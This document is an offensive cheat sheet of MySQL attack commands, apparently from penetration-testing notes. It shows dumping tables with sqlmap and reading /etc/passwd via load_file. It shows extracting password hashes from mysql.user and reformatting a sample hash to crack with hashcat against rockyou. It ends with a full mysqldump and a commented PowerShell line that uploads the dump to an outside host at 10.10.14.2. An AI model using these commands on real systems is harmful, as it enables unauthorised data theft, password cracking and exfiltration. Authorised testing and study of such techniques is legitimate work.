#####
MySQL
#####

******
Basics
******

.. code-block:: bash

  mysql -h SRV -D DBNAME -u USR -e 'show tables;' --password=PASS
  mysql -h SRV -D DBNAME -u USR -e 'select * from TABLE;' --password=PASS

|

******
SQLMAP
******

.. code-block:: bash

  sqlmap -d mysql://USR:PASS@SRV:3306/DBNAME -D DBNAME -T TABLE --dump --flush-session --batch

|

*********
Read File
*********

.. code-block:: bash

  # Read file (cat for correct render)
  mysql -h SRV -D DBNAME -u USR -e 'select load_file("/etc/passwd")' --password=PASS | echo -e "$(cat)"

|

*****
Hashs
*****

|

.. code-block:: bash

  mysql -h localhost -u USER -D DB --password='PASS' -e 'select user,plugin,hex(authentication_string) from mysql.user;'

|

| caching_sha2_password (hashcat 7401)

.. code-block:: bash

  cat <<'EOF'| sed 's#24412430303524\(.\{40\}\)\(.\{64\}\)#$mysql$A$005*\1*\2#g' | tee /tmp/hashestable
  | dev              | caching_sha2_password | 244124303035240D172F787569054E322523067049563540383D176F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
  EOF

.. code-block:: bash
  
  cat /tmp/hashestable | grep caching_sha2_password | tr -d ' '|cut -d'|' -f4 | tee /tmp/hashes

.. code-block:: bash

  hashcat -m 7401 -o /tmp/output.txt /tmp/hashes /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

|

****
Dump
****

.. code-block:: powershell

  C:\xampp\mysql\bin\mysqldump.exe -h localhost -u root --all-databases --force > /r/data.sql
  # powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.14.2:8888/','/r/data.sql')"

|